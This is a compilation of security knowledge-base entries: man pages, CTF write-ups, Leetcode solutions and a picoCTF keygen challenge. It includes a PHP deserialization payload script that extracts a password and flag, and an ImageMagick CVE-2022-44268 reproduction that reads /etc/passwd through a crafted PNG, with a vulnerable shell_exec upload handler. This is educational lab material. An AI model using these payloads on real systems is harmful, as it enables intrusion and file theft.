\h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH send 3tk 4.0 Tk "Tk Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME send \- 在一个不同的应用的执行一个命令 .SH "总览 SYNOPSIS" \fBsend ?\fIoptions\fR? \fIapp cmd \fR?\fIarg arg ...\fR? .BE .SH "描述 DESCRIPTION" .PP 这个命令安排在叫做 \fIapp \fR的应用中执行 \fIcmd\fR (和 \fIarg\fRs)。它返回这个命令执行的结果或错误。\fIApp\fR 可以是其主窗口在容纳发送者的主窗口的显示器上的任何应用的名字;不需要在同一个进程中。如果不存在 \fIarg\fR 参数,则要执行的这个命令完全的包含在 \fIcmd\fR 参数内。如果存在一个或多个 \fIarg\fRs,则把它们串联起来形成要执行的命令,就象 \fBeval\fR 命令那样。 .PP 如果这个命令的最初的参数开始于“-”,则把它们作为选项对待。当前定义了下列选项: .TP \fB\-async\fR 要求异步调用。在这种情况下 \fBsend\fR 命令将立即完成而不等待 \fIcmd\fR 在目标应用中完成;不能获得任何结果并且忽略在发送命令中的错误。如果目标应用与发送的应用在同一个进程中则忽略 \fB-async\fR 选项。 .TP \fB\-displayof\fR \fIpathName\fR 指定目标应用的主窗口是在用 \fIpathName \fR给出的窗口的显示器上,而不是包含应用的主窗口的显示器。 .TP \fB\-\|\-\fR 除了终止选项的列表没有其他用途。这个选择只在 \fIapp\fR 包含一个前导的“-”字符时需要。 .SH "应用的名字 APPLICATION NAMES" .PP 用程序或建立这个应用的脚本的名字来初始设置应用的名字。你可以用 \fBtk appname\fR 命令查询和变更一个应用的名字 .SH "停用发送 DISABLING SENDS" .PP 如果从应用中删除了 \fBsend\fR 命令(比如,使用了命令 \fBrename send {}\fR),则这个应用不对到来的发送请求做任何响应,也不能发起外出的请求。可以通过调用 \fBtk appname\fR 命令重新启用通信。 .SH "安全 SECURITY" .PP \fBsend\fR 命令是一个潜在的严重的安全漏洞。在 Unix 上,可以连接到你的 X 服务器的任何应用都可以向你的应用发送脚本。这些到来的脚本可以使用 Tcl 来读写你的文件和用你的名字调用子进程。 基于主机的访问控制比如 \fBxhost\fR 特别不安全,因为它允许在特定主机上有一个帐户的任何人连接到你的服务器上,并且如果停用了它则允许任何人从任何地方连接到你的服务器。为了提供少量的安全性,Tk 检查服务器使用的访问控制,并且除非是 (a)启用了 \fBxhost\fR式样的访问控制(就是说只有特定主机可以建立连接),和 (b)允许的主机的列表是空的,否则丢弃到来的发送。这意味着除非应用使用了其他形式的授权(authorization)比如 \fBxauth\fR,否则不能连接到服务器上。 .VS 在 Windows 上,目前禁用 \fBsend\fR。它的多数功能由 \fBdde\fR 命令提供。 .VE .SH "关键字 KEYWORDS" .VS application, dde, name, remote execution, security, send .VE .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2002/05/28 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
import codecs def convert_single_char(start_pos, bits): end_pos = 9 continuation = int(bits[start_pos]) character = bits[start_pos + 1:start_pos + 9] c = int(character, 2) if continuation: character = bits[start_pos + 9:start_pos + 18] c <<= 8 c += int(character, 2) end_pos += 9 return unichr(c), end_pos def convert_utf9(data): data_in_bin = bin(data)[2:] print(data_in_bin) print(len(data_in_bin)) init = 0 result = u"" while init < len(data_in_bin): character, end_pos = convert_single_char(init, data_in_bin) result += character init += end_pos print(result) def main(): with codecs.open("4042.txt") as file: data = file.read() data = data.replace("\n", "") number = int(data, 8) print(number) convert_utf9(number) main() #SECCON{A_GROUP_OF_NINE_BITS_IS_CALLED_NONET}
sec-knowleage
# LD_PRELOAD ## 原理 正常情况下, Linux 动态加载器`ld-linux`(见man手册ld-linux(8))会搜寻并装载程序所需的共享链接库文件, 而`LD_PRELOAD`是一个可选的环境变量, 包含一个或多个指向共享链接库文件的路径. 加载器会先于C语言运行库之前载入`LD_PRELOAD`指定的共享链接库,也就是所谓的预装载(`preload`)。 预装载意味着会它的函数会比其他库文件中的同名函数先于调用, 也就使得库函数可以被阻截或替换掉. 多个共享链接库文件的路径可以用`冒号`或`空格`进行区分. 显然不会受到`LD_PRELOAD`影响的也就只有那些静态链接的程序了. 当然为避免用于恶意攻击, 在`ruid != euid`的情况下加载器是不会使用`LD_PRELOAD`进行预装载的. 更多阅读: [https://blog.fpmurphy.com/2012/09/all-about-ld_preload.html#ixzz569cbyze4](https://blog.fpmurphy.com/2012/09/all-about-ld_preload.html#ixzz569cbyze4) ## 例题 下面以2014年`Hack In The Box Amsterdam: Bin 100`为例. 题目下载链接: [hitb_bin100.elf](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/linux-re/2014_hitb/hitb_bin100.elf) 这是一个64位的ELF文件. 运行结果如下图所示: 程序似乎在一直打印着一些句子. 并且没有停止下来的迹象. 我们就用IDA打开来看一下. 首先按下`Shift+F12`查找字符串. 显然, 除开一直在打印的句子外, 我们发现了一些有趣的字符串: ``` .rodata:0000000000400A53 00000006 C KEY: .rodata:0000000000400A5F 0000001F C OK YOU WIN. HERE'S YOUR FLAG: ``` 我们根据`OK YOU WIN. HERE'S YOUR FLAG: `的交叉引用来到关键代码处(我删去了一些不必要的代码). ``` c int __cdecl main(int argc, const char **argv, const char **envp) { qmemcpy(v23, &unk_400A7E, sizeof(v23)); v3 = v22; for ( i = 9LL; i; --i ) { *(_DWORD *)v3 = 0; v3 += 4; } v20 = 0x31337; v21 = time(0LL); do { v11 = 0LL; do { v5 = 0LL; v6 = time(0LL); srand(233811181 - v21 + v6); // 初始化随机数种子 v7 = v22[v11]; v22[v11] = rand() ^ v7; // 伪随机数 v8 = (&funny)[8 * v11]; while ( v5 < strlen(v8) ) { v9 = v8[v5]; if ( (_BYTE)v9 == 105 ) { v24[(signed int)v5] = 105; } else { if ( (_DWORD)v5 && v8[v5 - 1] != 32 ) v10 = __ctype_toupper_loc(); // 大写 else v10 = __ctype_tolower_loc(); // 小写 v24[(signed int)v5] = (*v10)[v9]; } ++v5; } v24[(signed int)v5] = 0; ++v11; __printf_chk(1LL, " 鈾%80s 鈾玕n", v24); // 乱码的其实是一个音符 sleep(1u); } while ( v11 != 36 ); --v20; } while ( v20 ); v13 = v22; // key存储在v22数组内 __printf_chk(1LL, "KEY: ", v12); do { v14 = (unsigned __int8)*v13++; __printf_chk(1LL, "%02x ", v14); // 输出key } while ( v13 != v23 ); v15 = 0LL; putchar(10); __printf_chk(1LL, "OK YOU WIN. HERE'S YOUR FLAG: ", v16); do { v17 = v23[v15] ^ v22[v15]; // 跟key的值有异或 ++v15; putchar(v17); // 输出flag } while ( v15 != 36 ); putchar(10); // 输出换行 result = 0; return result; } ``` 整个的代码流程主要就是在不断地循环输出`funny`里的句子, 满足循环条件后输出`key`, 并用`key`进行异或得到`flag`的值. 但我们可以发现, 整个循环的次数相对来说是比较少的. 所以我们可以采用一些方法, 让循环进行得更快一些. 比如说我手动patch一下, 不让程序输出字符串(实际上`printf`的耗时是相当多的), 其次就是使用`LD_PRELOAD`使得程序的`sleep()`失效. 可以很明显地节省时间. 手动patch的过程比较简单. 我们可以找到代码位置, 然后用一些十六进制编辑器进行修改. 当然我们也可以使用`IDA`来进行patch工作. ``` asm .text:00000000004007B7 call ___printf_chk .text:00000000004007BC xor eax, eax ``` 将光标点在`call ___printf_chk`上, 然后选择菜单`Edit->Patch Program->Assemble`(当然你可以使用其他patch方式. 效果都一样). 然后将其修改为`nop(0x90)`, 如下图所示 将`4007B7`到`4007BD`之间的汇编代码全部修改为`nop`即可. 然后选择菜单`Edit->Patch Program->Apply patches to input file`. 当然最好做一个备份(即勾选`Create a backup`), 然后点击OK即可(我重命名为了`patched.elf`, 下载链接: [patched.elf](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/linux-re/2014_hitb/patched.elf)). 现在进入`LD_PRELOAD`部分. 这里我们简单编写一下c代码, 下载链接: [time.c](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/linux-re/2014_hitb/time.c) ``` c static int t = 0x31337; void sleep(int sec) { t += sec; } int time() { return t; } ``` 然后使用命令`gcc --shared time.c -o time.so`生成动态链接文件. 当然也给出了下载链接: [time.so](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/linux-re/2014_hitb/time.so) 然后打开linux终端, 运行命令: `LD_PRELOAD=./time.so ./patched.elf` 过一会, 你就能听到CPU疯狂运转的声音, 然后很快就出来了flag.
sec-knowleage
ifup === 激活指定的网络接口 ## 补充说明 **ifup命令** 用于激活指定的网络接口。 ### 语法 ```shell ifup(参数) ``` ### 参数 网络接口:要激活的网络接口。 ### 实例 ```shell ifup eth0 #激活eth0 ```
sec-knowleage
# Serialize (Web) This challenge deserves highlighting because it required absolutely no guessing. We have to deal with the following PHP code: ```php <?php class MagicCode { private $command; private $commandArgs; public function __construct($command, $commandArgs) { $this->command = $command; $this->commandArgs = $commandArgs; } function __wakeup() { foreach($this->commandArgs as $k => $v) { $this->commandArgs[$k] = $this->__clearArgs($v); } } function __clearArgs($v) { return trim($v); } function __die($text) { die(json_encode(array("text" => $text))); } function __destruct() { if (in_array($this->command, array("print", "showFlag", "showSource"))) { @call_user_func_array(array($this, "__" . $this->command), $this->commandArgs); } else { $this->__die("What do you do?"); } } function __print() { global $PASSWORD; list($showPassword) = func_get_args(); if ($showPassword == $this->__pack()) { $this->__die($PASSWORD); } $this->__die("Nothing to do. Just passing by."); } function __pack() { return pack("H*", "766676433466787856624046542574234161323453457431525177336325"); } function __showFlag() { global $PASSWORD; global $FLAG; list($password) = func_get_args(); if ($password === $PASSWORD) { $this->__die($FLAG); } $this->__die("Try again."); } function __showSource() { highlight_file(__FILE__); } } ``` In the last line of code (that I somehow didn't copy), the POST data sent by the user is base64 decoded and unserialized. It's obvious what to do here: we need to craft a MagicCode object. The __destruct() method will be called by the runtime, and we will get a limited RCE on the server. In fact, it's enough to change `command` variable to `showFlag` to get "password" and `showSource` to get the flag. Crafting PHP serialized payloads is relatively easy because the serialization format is human readable and not very complicated. I crafted the following by hand (although in retrospect, I should've just used the code provided and serialize() function): ```python import requests payload = '''O:9:"MagicCode":2:{s:18:"\x00MagicCode\x00command";s:5:"print";s:22:"\x00MagicCode\x00commandArgs";a:1:{i:0;s:30:"vfvC4fxxVb@FT%t#Aa24SEt1RQw3c%";}}''' r = requests.post("https://magic-code.scs.ctf/", verify=False, data={"data": payload.encode('base64')}) print r.content ``` And this was enough to get the flag.
sec-knowleage
# Leetcode 题解 - 栈和队列 <!-- GFM-TOC --> * [Leetcode 题解 - 栈和队列](#leetcode-题解---栈和队列) * [1. 用栈实现队列](#1-用栈实现队列) * [2. 用队列实现栈](#2-用队列实现栈) * [3. 最小值栈](#3-最小值栈) * [4. 用栈实现括号匹配](#4-用栈实现括号匹配) * [5. 数组中元素与下一个比它大的元素之间的距离](#5-数组中元素与下一个比它大的元素之间的距离) * [6. 循环数组中比当前元素大的下一个元素](#6-循环数组中比当前元素大的下一个元素) <!-- GFM-TOC --> ## 1. 用栈实现队列 232\. Implement Queue using Stacks (Easy) [Leetcode](https://leetcode.com/problems/implement-queue-using-stacks/description/) / [力扣](https://leetcode-cn.com/problems/implement-queue-using-stacks/description/) 栈的顺序为后进先出,而队列的顺序为先进先出。使用两个栈实现队列,一个元素需要经过两个栈才能出队列,在经过第一个栈时元素顺序被反转,经过第二个栈时再次被反转,此时就是先进先出顺序。 ```java class MyQueue { private Stack<Integer> in = new Stack<>(); private Stack<Integer> out = new Stack<>(); public void push(int x) { in.push(x); } public int pop() { in2out(); return out.pop(); } public int peek() { in2out(); return out.peek(); } private void in2out() { if (out.isEmpty()) { while (!in.isEmpty()) { out.push(in.pop()); } } } public boolean empty() { return in.isEmpty() && out.isEmpty(); } } ``` ## 2. 用队列实现栈 225\. Implement Stack using Queues (Easy) [Leetcode](https://leetcode.com/problems/implement-stack-using-queues/description/) / [力扣](https://leetcode-cn.com/problems/implement-stack-using-queues/description/) 在将一个元素 x 插入队列时,为了维护原来的后进先出顺序,需要让 x 插入队列首部。而队列的默认插入顺序是队列尾部,因此在将 x 插入队列尾部之后,需要让除了 x 之外的所有元素出队列,再入队列。 ```java class MyStack { private Queue<Integer> queue; public MyStack() { queue = new LinkedList<>(); } public void push(int x) { queue.add(x); int cnt = queue.size(); while (cnt-- > 1) { queue.add(queue.poll()); } } public int pop() { return queue.remove(); } public int top() { return queue.peek(); } public boolean empty() { return queue.isEmpty(); } } ``` ## 3. 最小值栈 155\. Min Stack (Easy) [Leetcode](https://leetcode.com/problems/min-stack/description/) / [力扣](https://leetcode-cn.com/problems/min-stack/description/) ```java class MinStack { private Stack<Integer> dataStack; private Stack<Integer> minStack; private int min; public MinStack() { dataStack = new Stack<>(); minStack = new Stack<>(); min = Integer.MAX_VALUE; } public void push(int x) { dataStack.add(x); min = Math.min(min, x); minStack.add(min); } public void pop() { dataStack.pop(); minStack.pop(); min = minStack.isEmpty() ? Integer.MAX_VALUE : minStack.peek(); } public int top() { return dataStack.peek(); } public int getMin() { return minStack.peek(); } } ``` 对于实现最小值队列问题,可以先将队列使用栈来实现,然后就将问题转换为最小值栈,这个问题出现在 编程之美:3.7。 ## 4. 用栈实现括号匹配 20\. Valid Parentheses (Easy) [Leetcode](https://leetcode.com/problems/valid-parentheses/description/) / [力扣](https://leetcode-cn.com/problems/valid-parentheses/description/) ```html "()[]{}" Output : true ``` ```java public boolean isValid(String s) { Stack<Character> stack = new Stack<>(); for (char c : s.toCharArray()) { if (c == '(' || c == '{' || c == '[') { stack.push(c); } else { if (stack.isEmpty()) { return false; } char cStack = stack.pop(); boolean b1 = c == ')' && cStack != '('; boolean b2 = c == ']' && cStack != '['; boolean b3 = c == '}' && cStack != '{'; if (b1 || b2 || b3) { return false; } } } return stack.isEmpty(); } ``` ## 5. 数组中元素与下一个比它大的元素之间的距离 739\. Daily Temperatures (Medium) [Leetcode](https://leetcode.com/problems/daily-temperatures/description/) / [力扣](https://leetcode-cn.com/problems/daily-temperatures/description/) ```html Input: [73, 74, 75, 71, 69, 72, 76, 73] Output: [1, 1, 4, 2, 1, 1, 0, 0] ``` 在遍历数组时用栈把数组中的数存起来,如果当前遍历的数比栈顶元素来的大,说明栈顶元素的下一个比它大的数就是当前元素。 ```java public int[] dailyTemperatures(int[] temperatures) { int n = temperatures.length; int[] dist = new int[n]; Stack<Integer> indexs = new Stack<>(); for (int curIndex = 0; curIndex < n; curIndex++) { while (!indexs.isEmpty() && temperatures[curIndex] > temperatures[indexs.peek()]) { int preIndex = indexs.pop(); dist[preIndex] = curIndex - preIndex; } indexs.add(curIndex); } return dist; } ``` ## 6. 循环数组中比当前元素大的下一个元素 503\. Next Greater Element II (Medium) [Leetcode](https://leetcode.com/problems/next-greater-element-ii/description/) / [力扣](https://leetcode-cn.com/problems/next-greater-element-ii/description/) ```text Input: [1,2,1] Output: [2,-1,2] Explanation: The first 1's next greater number is 2; The number 2 can't find next greater number; The second 1's next greater number needs to search circularly, which is also 2. ``` 与 739. Daily Temperatures (Medium) 不同的是,数组是循环数组,并且最后要求的不是距离而是下一个元素。 ```java public int[] nextGreaterElements(int[] nums) { int n = nums.length; int[] next = new int[n]; Arrays.fill(next, -1); Stack<Integer> pre = new Stack<>(); for (int i = 0; i < n * 2; i++) { int num = nums[i % n]; while (!pre.isEmpty() && nums[pre.peek()] < num) { next[pre.pop()] = num; } if (i < n){ pre.push(i); } } return next; } ```
sec-knowleage
# ImageMagick任意文件读取漏洞(CVE-2022-44268) ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 在ImageMagick 7.1.0-51版本及以前,其处理PNG文件的代码中存在一处功能,会导致转换图片时读取到当前操作系统上的任意文件,并将文件内容输出在图片内容中。 参考链接: - <https://www.metabaseq.com/imagemagick-zero-days/> - <https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#710-52---2022-11-06> ## 漏洞环境 执行如下命令启动一个Web服务器,这个服务器的功能是将用户上传的任意图片缩小成50x50的PNG图片。 ``` docker compose up -d ``` 服务启动后,访问`http://your-ip:8080`可以看到图片上传框: ![](1.png) [后端服务](index.php)的代码十分简单: ```php $newname = uniqid() . '.png'; shell_exec("convert -resize 50x50 {$_FILES['file_upload']['tmp_name']} ./{$newname}"); ``` ## 漏洞复现 利用这个漏洞,需要先准备一个恶意PNG文件,文件内容中包含我们准备读取的文件路径: 可以使用[poc.py](poc.py)来生成这个图片: ``` ./poc.py generate -o poc.png -r /etc/passwd ``` > 执行poc.py前请安装[PyPNG](https://pypng.readthedocs.io/en/latest/):`pip install pypng` 如果你使用[010editor](https://en.wikipedia.org/wiki/010_Editor)查看这个图片,可以看到其中包含一个类型是`tEXt`的chunk,其中包含我们的Payload `profile=/etc/passwd`: ![](2.png) 接着,我们将这个图片上传到目标服务中: ![](3.png) 下载服务处理后生成的图片,使用[poc.py](poc.py)提取出其中所有内容: ``` ./poc.py parse -i out.png ``` ![](4.png) 可以看到,已经提取出`/etc/passwd`文件的内容,这部分内容是由ImageMagick在处理旧图片时读取并写入到新图片中。
sec-knowleage
unlink === 系统调用函数unlink去删除指定的文件 ## 补充说明 **unlink命令** 用于系统调用函数unlink去删除指定的文件。和rm命令作用一样,都是删除文件。 ### 语法 ```shell unlink(选项)(参数) ``` ### 选项 ```shell --help:显示帮助; --version:显示版本号。 ``` ### 参数 文件:指定要删除的文件。
sec-knowleage
--- title: APISIX 介绍 --- <center><h1>APISIX 介绍</h1></center> --- Apache APISIX 是一个由 Apache 基金会孵化的一个开源的云原生 API 网关,具有高性能、可扩展的特点,与传统的 API 网关相比,APISIX 是通过插件的形式来提供负载均衡、日志记录、身份鉴权、流量控制等功能。 <script> export default { mounted () { this.$page.lastUpdated = "2022年4月30日" } } </script>
sec-knowleage
# keygenme-py Category: Reverse Engineering, 30 points ## Description A Python file was attached. ```python #============================================================================# #============================ARCANE CALCULATOR===============================# #============================================================================# import hashlib from cryptography.fernet import Fernet import base64 # GLOBALS --v arcane_loop_trial = True jump_into_full = False full_version_code = "" username_trial = "GOUGH" bUsername_trial = b"GOUGH" key_part_static1_trial = "picoCTF{1n_7h3_|<3y_of_" key_part_dynamic1_trial = "xxxxxxxx" key_part_static2_trial = "}" key_full_template_trial = key_part_static1_trial + key_part_dynamic1_trial + key_part_static2_trial star_db_trial = { "Alpha Centauri": 4.38, "Barnard's Star": 5.95, "Luhman 16": 6.57, "WISE 0855-0714": 7.17, "Wolf 359": 7.78, "Lalande 21185": 8.29, "UV Ceti": 8.58, "Sirius": 8.59, "Ross 154": 9.69, "Yin Sector CL-Y d127": 9.86, "Duamta": 9.88, "Ross 248": 10.37, "WISE 1506+7027": 10.52, "Epsilon Eridani": 10.52, "Lacaille 9352": 10.69, "Ross 128": 10.94, "EZ Aquarii": 11.10, "61 Cygni": 11.37, "Procyon": 11.41, "Struve 2398": 11.64, "Groombridge 34": 11.73, "Epsilon Indi": 11.80, "SPF-LF 1": 11.82, "Tau Ceti": 11.94, "YZ Ceti": 12.07, "WISE 0350-5658": 12.09, "Luyten's Star": 12.39, "Teegarden's Star": 12.43, "Kapteyn's Star": 12.76, "Talta": 12.83, "Lacaille 8760": 12.88 } def intro_trial(): print("\n===============================================\n\ Welcome to the Arcane Calculator, " + username_trial + "!\n") print("This is the trial version of Arcane Calculator.") print("The full version may be purchased in person near\n\ the galactic center of the Milky Way galaxy. \n\ Available while supplies last!\n\ =====================================================\n\n") def menu_trial(): print("___Arcane Calculator___\n\n\ Menu:\n\ (a) Estimate Astral Projection Mana Burn\n\ (b) [LOCKED] Estimate Astral Slingshot Approach Vector\n\ (c) Enter License Key\n\ (d) Exit Arcane Calculator") choice = input("What would you like to do, "+ username_trial +" (a/b/c/d)? ") if not validate_choice(choice): print("\n\nInvalid choice!\n\n") return if choice == "a": estimate_burn() elif choice == "b": locked_estimate_vector() elif choice == "c": enter_license() elif choice == "d": global arcane_loop_trial arcane_loop_trial = False print("Bye!") else: print("That choice is not valid. Please enter a single, valid \ lowercase letter choice (a/b/c/d).") def validate_choice(menu_choice): if menu_choice == "a" or \ menu_choice == "b" or \ menu_choice == "c" or \ menu_choice == "d": return True else: return False def estimate_burn(): print("\n\nSOL is detected as your nearest star.") target_system = input("To which system do you want to travel? ") if target_system in star_db_trial: ly = star_db_trial[target_system] mana_cost_low = ly**2 mana_cost_high = ly**3 print("\n"+ target_system +" will cost between "+ str(mana_cost_low) \ +" and "+ str(mana_cost_high) +" stone(s) to project to\n\n") else: # TODO : could add option to list known stars print("\nStar not found.\n\n") def locked_estimate_vector(): print("\n\nYou must buy the full version of this software to use this \ feature!\n\n") def enter_license(): user_key = input("\nEnter your license key: ") user_key = user_key.strip() global bUsername_trial if check_key(user_key, bUsername_trial): decrypt_full_version(user_key) else: print("\nKey is NOT VALID. Check your data entry.\n\n") def check_key(key, username_trial): global key_full_template_trial if len(key) != len(key_full_template_trial): return False else: # Check static base key part --v i = 0 for c in key_part_static1_trial: if key[i] != c: return False i += 1 # TODO : test performance on toolbox container # Check dynamic part --v if key[i] != hashlib.sha256(username_trial).hexdigest()[4]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[5]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[3]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[6]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[2]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[7]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[1]: return False else: i += 1 if key[i] != hashlib.sha256(username_trial).hexdigest()[8]: return False return True def decrypt_full_version(key_str): key_base64 = base64.b64encode(key_str.encode()) f = Fernet(key_base64) try: with open("keygenme.py", "w") as fout: global full_version global full_version_code full_version_code = f.decrypt(full_version) fout.write(full_version_code.decode()) global arcane_loop_trial arcane_loop_trial = False global jump_into_full jump_into_full = True print("\nFull version written to 'keygenme.py'.\n\n"+ \ "Exiting trial version...") except FileExistsError: sys.stderr.write("Full version of keygenme NOT written to disk, "+ \ "ERROR: 'keygenme.py' file already exists.\n\n"+ \ "ADVICE: If this existing file is not valid, "+ \ "you may try deleting it and entering the "+ \ "license key again. Good luck") def ui_flow(): intro_trial() while arcane_loop_trial: menu_trial() # Encrypted blob of full version full_version = \ b""" gAAAAABgT_nv39GmDRYkPhrc2hba8UHCHnSTHqdFxXNdemW0svN2hYYw-6n56ErD3NrQYQlNL0sfdsGTmvWKxh5gVRGeCv5kNq-l6PpL0Fzzjo1x_E2Jjbw_xWKIwbvd7BRXFQZKnhs2ehcSEacqES4gsVMOExHUetxFtmYiHLMB0_kqueeT8zf_vcXAPzbiYA0hvD_QSAXzPiKwM2IsGpGzIS5O4_ODq6-knKszeQFstWKFNH_-jNAylCTWSQpPrWqJxCWhSINPhOZ9-PkBsy8lpqmksa6ZBCMvej4W9YFldupRHNoHUHzt8xScEvcsTzIgNmvzOsCBSf5GJGHbLw4yVjsNWmbKRKiE_6BrRMHZW01hcYbfNa1TdJ1MLUX64e_tpDDjMfKvlXZ1qMx4GDwR2lFza9_fm98zoaV-ccgQ1qiSf3wDU1KuKxd9e9TbUAn2TTJfVH9d6IU8emK3QWcn8XRFcMRzVMvlBuNnCVrZmHCYZUzRmwneo15FS-giH63hPzfvjuRfzwp1sFa3wqo5YTJHWejsU0suORvViiDuIpDozmlXTLKLhKj51NkI6QqqDXhMcWkHwKy9V1LN2Furmz_rPbahbNAxnTAWpjF0VELQAvyNHdVy0yxBIbbOJq1oMvHiDJo2adecADc8hMRb4RZJoLqokXxtKLulywhagQjX9METL9bw1YTP9orWXAMwKhTdDbEUdnHViEq8MHo5DcnVvH0yPlnc9Zn2s3_UOfswnhz5vKm0ZbDc5aX0sFTNiMJVjjCrMhQ6HYp5yf_ybd9Tcx_u6xLtwUZBERZWt931n4hQN8n4C_XmDsMehuoSuFmi2NpAuDhX2rcEQK86Ito0KYp-8n2RmbOjzcjo5V5aqHXujmEfX8GYIUWEUKXVcFouF5rZtxtNz3Wsm_j4tqL4Tom27YE5eK7LQSi5B-AsmSF5JGTam2mWeykOGyE-3pHZmNxxkRfdRjxM0uFV13yjQSLFgNIkZ--8n0uAoTb62c7ZFxoFItMNrWasd5zMvp9Nqq70se2KOUieV6VbPJdSL0Sf1uGDmbRFdMmopDm-AuS-7-MLBGiOPmwXtse_9yXjUggeuo3UU4bxyQxCgwh17Ul1ZgxGeopcU7s7Sjm3rqxwlaJWTPRzeF5AXxtZHgyyZjwQ3EB9xYeoMCFh6gsF06bcwnK1Esgar7IYR3JBUfBH6KnWiTyhx_dLkUdomAPMPY0cRoreYsXmFKkEWhYg-TCdifL0nRT8BTEhVyUwFTvqn4PJknTn8NXelYu8co3n8_PoxsOnTrbdNXBJP9vD8Qp2oMi0ZsyCIeekwuX7MCcK4oFVpLGwOrhJdQhJWVqxQdt0ULS-ROB08eOglsXifnVrDl0hi2B0EYcWxxGs-CzsXJPSBvqKWti9XdU5oIhuUH2d7jnAx0pM9tTKqNiL5sfL2mhakMI8XGcljZw2KI0ldgaOW_UvAgh8N3FgKUR4qh_iJ0raoQaaJJFbFneKRoDNT3QsywP_qj6avStEbMGnhN3iBOoc7S3VrN8853X5fow2yDUJaexAKjpYGphE7K4e1g3fHWYjvgnJ-AoXfqALOwDLzaLRjVHSsgF1TQl39XgiAgEzJL-7w_zBn_Hxl5BfYtqe4vxf4PVMZGvof0jXMpM4W-AQ8IW-41LbNgNbPnRuTLubiJCV7MWYu8J7wO0ADSqgv0aXK60IOl0NphAzflWRvjytyT1CljFa0wcsBZvTyyks_ZOoa2__iAj3VlQjcrQynzrxoT5NASs_k51IYPr913nkfOT29oekedYMcxaHzlICLXmjlVHctJfATgYue7xc1BotMDO0Uj5q-wfcg03dq1cZmJ_qhe3AqWrZt3RraYVcvTT2B9Nu2KHBTyjQvCsQMXyFjlqasFZ4jSuNcqybxS3ocP4z-5oGV43zsVjr6YAZyjQiUoLJN6i6h39G5YfH4SStpbTcj7WXWj9WNqxcrF_swHNeIkOPByEa34TIXyJvEOGefZOw7h-F-hxCGuho7LOwabIopS6IykeSLMw1Ra4COmYN-VamVHVUGo50AVEXcmcnHL9NmXP_812Y_sSFdNPo-jglCzjv3KS5jajY1tReYKC9ehz5phUgReaVkiawSc5Tm5BZ42dfJuYZeTwnknsgTWiyGt3Ov6PddqD_40Ye6oHMLO0VjjT_Ul8GWh8hhmxcWxbN8H6dYwLJD0_-YbXvFpRQSi8IQ7BKjY0ZrZm1_tYO87Gg5YcUJznce53ltjXtGCgNIqywt3FDyJ709hOATCIHWf_u-Jfmc7QcIuSss7Rjh68ZgQoQu0Ybjt0Y5bEGEymuyYbgvdUwW8xTksnpl9Jju4x8hMORUQtkyxD0SBG1j7OEsDCK4axMjWxBj4D0liLOSwUuCWr5COJ0Bf_SlydQmufol1HzVIwxTSUG2m7gXEO6cv6gvBIzK0DdcUMjEzXNnqa8davVM0tFvXfuQcgjz8C7tj4-fu4UvikQyAvO5PdSIhClyl06fAyuUmmJgKvyyuoX3plOaMqq5rJbCzXl8OV1anQzSscXIR2Ur_ePhX5IoZNe2XifzLkgVk-lc-Z0gj5Q4WRuo2IYxOcJG-woHvml0oHDY-hQU-gNflauD38YQcfpwdXV0WgcQseWgKNlXfEuldWVktYXn8JNvqVUTOXrNJBEGB9RDyQqp9IubjhQqOJh31eunKYq6oTx4PgjSii0QOKaLKkonBsYtAbb3cUwSoCvek719cI2tp33XWYq2UqQ8J74PtRNzG061_RR_TxHKyWBll-6ii9dgFPki104UzjFkFXkYPzButkzcvcXIDAWD2RNBK6-bshYKS2xr5XxJXgr3QBTWdjrm-p6EwlbFd4DGDR7ran7b38NRkrFD0ignYiKc68xlAPGg9E084LBVXCVlRas8YvYReJH_sl6ZR7faNme2F-qYFzbcvD3jmp5fX0nzvyJuTGWa51qh7siaVBxHETZ_rzoqTh-tr91b_aHPFdcQMfe1Pd-